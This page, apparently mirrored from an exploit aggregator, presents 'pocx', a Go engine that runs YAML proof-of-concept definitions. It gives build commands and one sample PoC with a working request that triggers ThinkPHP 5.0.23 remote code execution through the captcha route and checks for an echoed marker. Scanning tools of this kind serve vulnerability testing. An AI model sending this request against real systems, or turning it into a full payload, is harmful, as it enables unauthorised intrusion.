Share
## https://sploitus.com/exploit?id=903165D4-D8A1-56AE-A379-4B960FF5AFD5
# pocx

一个完善的 yaml poc 引擎,poc 定义在wiki中

使用方法参考 _example/main.go

## 未实现

- 部分表达式函数
- toUintString // expression/expr.go
- TCP/UDP 的 yaml 实现
- Python 等语言的集成


# pocx发版记录
 * v2.0 增加rmi协议支持

## linux 交叉编译
```base
CGO_ENABLED=0 GOOS=darwin GOARCH=amd64 go build -o pocx_mac_623 main.go
CGO_ENABLED=0 GOOS=windows GOARCH=amd64 go build -o pocx_windows_623.exe main.go
CGO_ENABLED=0 GOOS=linux GOARCH=amd64 go build -o pocx_linux _623 main.go
```

```yaml
id: 19b92bc4-9d03-4394-8f50-5c2ef3a05d36
name: thinkphp-5023-rce
tags:
    - thinkphp
transport: http
needreverse: false
set:
    v: randomLowercase(8)
rules:
    r0:
        request:
            body: _method=__construct&filter[]=printf&method=get&server[REQUEST_METHOD]={{v}}
            cache: false
            follow_redirects: false
            headers:
                Content-Type: application/x-www-form-urlencoded
            method: POST
            path: /index.php?s=captcha
        expression: response.status == 200 && response.body.bcontains(bytes(v))
        output: null
expression: r0()
detail:
    fingerprint:
        softhard: ""
        name: ""
        company: ""
        category: ""
        parent_category: ""
    vulnerability:
        author: ""
        links: ""
        severity: ""
        description: ""
        proof: {}

```